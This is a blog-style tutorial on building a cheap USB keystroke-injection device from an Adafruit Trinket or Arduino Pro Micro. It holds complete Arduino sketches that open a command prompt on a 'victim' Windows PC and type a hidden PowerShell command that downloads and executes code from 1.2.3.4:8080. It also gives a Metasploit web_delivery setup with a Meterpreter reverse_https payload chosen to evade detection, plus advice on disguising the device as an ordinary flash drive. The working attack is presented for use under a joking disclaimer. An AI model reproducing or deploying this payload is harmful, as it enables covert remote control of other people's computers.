Hacking a computer in 3 seconds. We make a USB duck from scratch on Arduino

Let's start with the traditional "This material is presented only for educational purposes." If you use this information to crack HBO and release the next season of Game of Thrones for free on YouTube, well ... great. In the sense that I do not encourage such behavior.

If you don't know what a “rubber ducky” (USB Rubber Ducky) is, this is the device that Hak5 made in the photo. It looks and behaves like a regular USB flash drive, but it can be programmed to enter keys very quickly from the keyboard. "Duck" is able to hack any system in a few seconds. The only drawback is that you need physical access to the computer. And it costs $ 50, which is why I wrote this article.

We use 5V Adafruit Trinket and a microUSB cable - that's all we need.

Fortunately, Adafruit provides a library for the keyboard interface via USB, so we do it right away #include. You will need to install the library by following this instruction.

#include <TrinketKeyboard.h>

We can play with the library to begin with, let's start by initializing the flash drive as a HID device using the begin () method.

#include<TrinketKeyboard.h>voidsetup(){
    TrinketKeyboard.begin();
}
voidloop(){
    TrinketKeyboard.print("Help, I am trapped in a computer! \n");
    delay(500);
}

Looks good. Now run the commands on the victim's computer. This can be done by “pressing” the Windows key, typing cmd, Enter, and then the command itself.

#include<TrinketKeyboard.h>voidpressEnter(){
	TrinketKeyboard.pressKey(0, 0x28);
	delay(10);
	TrinketKeyboard.pressKey(0,0);
	delay(300);
}
voidwinRun(){
	TrinketKeyboard.pressKey(0x08, 0x15);
	delay(30);
	TrinketKeyboard.pressKey(0,0);
}
voidsetup(){
	TrinketKeyboard.begin();
	delay(1000);
	winRun();
	delay(100);
	winRun();
	delay(300);
	// Run cmd
	TrinketKeyboard.print("cmd");
	pressEnter();
	delay(500);
	TrinketKeyboard.print("ipconfig");
	delay(100);
	pressEnter();
}

Fine. Create an exploit in the Metasploit framework.

---

We will use the web_delivery module . I chose it because of the high speed and low likelihood of antivirus. He also does not write to the disk, so he will not leave traces at the end of the work.

Here we break the 64-bit Windows 10, so we’ll select the target PowerShell, but be warned, this will not exploit against PowerShell. We simply use the shell to download the necessary files from the server.

use exploit/multi/script/web_delivery

We need to tell our program where to get the binaries:

set LHOST 1.2.3.4

Then we specify the port that does not arouse suspicion, what about 443? ;)

set LPORT 443

Metasploit generates a random URIPATH every time, and we want to be able to start and stop port listening at any time without having to recompile the flash drive code.

set URIPATH /

Now you need to select Powershell as the delivery method. The exploit supports three targets marked with identifiers: these are 0: Python, 1: PHP, and 2: Powershell.

set TARGET 2

Now we set the payload. I use reverse_https, because we work on port 443. For most intrusion detection systems it will look like a normal connection.

set PAYLOAD windows/meterpreter/reverse_https

And finally exploit.

In order to conveniently stop and resume port audition, create a configuration file: usb.rc. We get the payload to run on the victim's computer: Now we can run it from the flash drive.

use exploit/multi/script/web_delivery
set LHOST 1.2.3.4
set LPORT 443
set URIPATH /
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_https
exploit



powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring('http://1.2.3.4:8080/');

#include<TrinketKeyboard.h>voidpressEnter(){
    TrinketKeyboard.pressKey(0, 0x28);
  	delay(10);
  	TrinketKeyboard.pressKey(0,0);
  	delay(300);
}
voidwinRun(){
  	TrinketKeyboard.pressKey(0x08, 0x15);
  	delay(30);
  	TrinketKeyboard.pressKey(0,0);
}
voidsetup(){
  	TrinketKeyboard.begin();
  	delay(1000);
  	winRun();
  	delay(100);
  	winRun();
  	delay(300);
  	// Run cmd
  	TrinketKeyboard.print("cmd");
  	pressEnter();
  	delay(500);
  	TrinketKeyboard.print("powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring('http://1.2.3.4:8080/');"); 
  	delay(100);
  	pressEnter();
}
voidloop(){
  	// nothing happens after setup
}

It works very well. We need about 40 seconds to fuck Deaneris, I mean the victim's computer.



Due to the limited power of the duck, the bootloader is not available all the time, as in a regular Arduino, you can download the code only when you press a button on a flash drive or during the first 30 seconds of operation. That is, we wait for the first 30 seconds after connecting the flash drive until the code really works, and then another 10 seconds for dialing and executing the script. It would be very useful to reduce the access time by 75%. This is a good man who edited the firmware to skip the bootloader when connected. We took the code and reshuffled the flash drive, rebooted the code and ta-dam - it works. But you can do even better: it would be good to hide the chip in the case so that it does not arouse suspicion.

---

I chose one of those inconspicuous USB flash drives that recruiters hand out in millions, and ordered these cool little microUSB-USB A. OTG adapters. I had to cut off unnecessary parts of the circuit board to fit in the case, put the OTG adapter into the USB A case and taped up everything with superglue. For me, this does not look suspicious at all, but still 10 seconds is a long time, especially when you hide from dragons.



You can also order the Arduino Pro Micro on Amazon for about $ 10. If you have patience, you can even find on eBay for about $ 3 or $ 4. I didn’t have a USB flash drive large enough for the Pro Micro, so I plugged in the OTG adapter, rewound it with tape and calmed it down.



It is necessary to change the program a little, because we use another library, but it will work as before.

#include"Keyboard.h"voidwinRun(){
  	Keyboard.press(KEY_LEFT_GUI);
  	Keyboard.press('r');
  	delay(30);
  	Keyboard.releaseAll();
  	delay(100);
}
voidsetup(){
  	Keyboard.begin();
  	delay(2000);
  	winRun();
  	Keyboard.println("cmd");
  	Keyboard.write(KEY_RETURN);
  	delay(500);
  	Keyboard.println("powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring('http://1.2.3.4:8080/');"); 
  	Keyboard.write(KEY_RETURN);
}
voidloop(){
  // put your main code here, to run repeatedly:
}

Pro Micro's biggest advantage is speed. Now we need only 3 seconds of physical access. A real attack on the go. If you intend to use this force, do it for the sake of a good cause. Kill Cersei.